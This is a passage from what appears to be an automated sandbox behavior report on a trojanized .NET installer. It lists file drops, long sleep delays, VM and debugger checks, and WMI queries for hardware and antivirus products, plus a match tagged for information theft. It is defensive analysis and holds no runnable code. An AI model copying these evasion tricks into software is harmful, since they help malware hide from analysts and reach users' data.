                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -595840s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -595704s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -595562s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -595453s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -595323s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -595218s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -595100s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -594984s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -594875s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -594575s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -594468s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -594359s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe TID: 6548 Thread sleep time: -594249s >= -30000s
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe Evasive API call chain: GetLocalTime,DecisionNodes graph_2-16680
                          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                          Source: C:\Windows\splwow64.exe Last function: Thread delayed
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep graph_2-15672
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 600000
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 599843
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 599713
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 599604
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 599495
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 599390
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 599280
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 599159
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 599031
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 598921
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 598796
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 598687
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 598577
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 598468
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 598359
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 598250
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 598140
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 598030
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 597921
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 597812
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 597703
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 597593
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 597480
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 597375
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 597265
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 597156
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 597046
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 596937
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe Thread delayed: delay time: 596828
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596718Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596609Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596500Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596390Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596278Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596171Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 596062Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595952Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595840Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595704Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595562Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595453Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595323Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595218Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 595100Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594984Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594875Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594575Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594468Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594359Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 594249Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWindow / User API: threadDelayed 3036Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWindow / User API: threadDelayed 6813Jump to behavior
                          Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 1865
                          Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 8071
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-76546
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\3082\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1042\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1043\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1044\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1041\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1040\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\3076\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1035\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1036\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1038\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1037\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1031\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1033\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1032\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1028\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1055\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1030\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1029\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1053\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\2070\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1025\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\2052\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\SetupUtility.exeJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1046\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1045\SetupResources.dllJump to dropped file
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeDropped PE file which has not been started: C:\6c8944922f7b98d0b6cd82b768\1049\SetupResources.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0021774A
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-76742
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeAPI call chain: ExitProcess graph end nodegraph_4-75963
                          Source: EQB4OREJ.exe.0.drBinary or memory string: VMware
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
                          Source: EQB4OREJ.exe, 00000003.00000002.975473713.000000001B7F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time48
                          Source: EQB4OREJ.exe, 00000003.00000002.970207921.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
                          Source: EQB4OREJ.exe, 00000003.00000002.976004726.000000001B87F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
                          Source: EQB4OREJ.exe, 00000003.00000002.976371340.000000001C498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
                          Source: EQB4OREJ.exe, 00000003.00000002.975473713.000000001B7F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
                          Source: EQB4OREJ.exe, 00000003.00000002.970207921.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.803257164.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe.0.drBinary or memory string: Hyper-V Video
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
                          Source: EQB4OREJ.exe, 00000003.00000002.976371340.000000001C498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware7MUBNG6CWin32_VideoControllerTR8H7FY_VideoController120060621000000.000000-000698595.1display.infMSBDA9BZP6XNCPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemuser-PC1280 x 1024 x 4294967296 colors5V9DYM_Xt32K
                          Source: EQB4OREJ.exe, 00000003.00000002.976371340.000000001C498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
                          Source: Setup.exe, 00000004.00000002.3300624155.0000000003930000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
                          Source: EQB4OREJ.exe, 00000003.00000002.976451753.000000001C4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
                          Source: EQB4OREJ.exe, 00000003.00000002.976451753.000000001C4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V gjvpnntxjiwxknt Bus Pipes
                          Source: EQB4OREJ.exe, 00000003.00000002.976451753.000000001C4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
                          Source: EQB4OREJ.exe, 00000003.00000002.976451753.000000001C4CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitionc
                          Source: EQB4OREJ.exe, 00000003.00000002.976371340.000000001C498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V gjvpnntxjiwxknt Busop
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.000000000284C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
                          Source: EQB4OREJ.exe.0.drBinary or memory string: VMware Virtual
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021CA78 GetSystemInfo,2_2_0021CA78
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002192BB GetFileAttributesW,GetLastError,SetFileAttributesW,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,GetLastError,FindClose,RemoveDirectoryW,GetLastError,2_2_002192BB
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021A7B1 FindFirstFileW,GetLastError,FindNextFileW,CloseHandle,FindClose,2_2_0021A7B1
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C638097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_6C638097
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C624281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_6C624281
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C925B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_6C925B82
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C92410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_6C92410A
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021B4B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0021B4B3
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002291D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_002291D5
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C96C78B VirtualProtect ?,-00000001,00000104,?4_2_6C96C78B
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021621F GetTickCount,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,2_2_0021621F
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002291D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_002291D5
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0022AE73 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0022AE73
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002297AE SetUnhandledExceptionFilter,2_2_002297AE
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_00032BA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00032BA5
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_000345BE _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_000345BE
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4A87C1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C4A87C1
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4AB38A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C4AB38A
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C62171F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C62171F
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C9476A7 __EH_prolog3,GetModuleHandleW,GetProcAddress,SetThreadStackGuarantee,SetUnhandledExceptionFilter,GetCommandLineW,4_2_6C9476A7
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C96EB6A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6C96EB6A
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C96B091 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C96B091
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe "C:\ProgramData\Start Menu\G5K9HNJ7.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe "C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe" Jump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtfJump to behavior
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C91DF27 AllocateAndInitializeSid,4_2_6C91DF27
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C943657 GetSecurityDescriptorDacl,_malloc,InitializeSecurityDescriptor,_free,GetAclInformation,_malloc,_memcpy_s,SetSecurityDescriptorDacl,_free,_free,4_2_6C943657

                          Language, Device and Operating System Detection

                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeQueries volume information: C:\Users\user\Desktop\dotNetFx40_Full_setup.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeQueries volume information: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe VolumeInformationJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002184C7 GetLocalTime,swprintf,2_2_002184C7
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00218E9C GetTimeZoneInformation,GetSystemTime,SystemTimeToTzSpecificLocalTime,2_2_00218E9C
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00228FF5 GetVersion,GetModuleHandleW,GetProcAddress,2_2_00228FF5
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: EQB4OREJ.exe, 00000003.00000002.975955192.000000001B870000.00000004.00000020.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970207921.000000000094E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                          Stealing of Sensitive Information

                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack, type: UNPACKEDPE
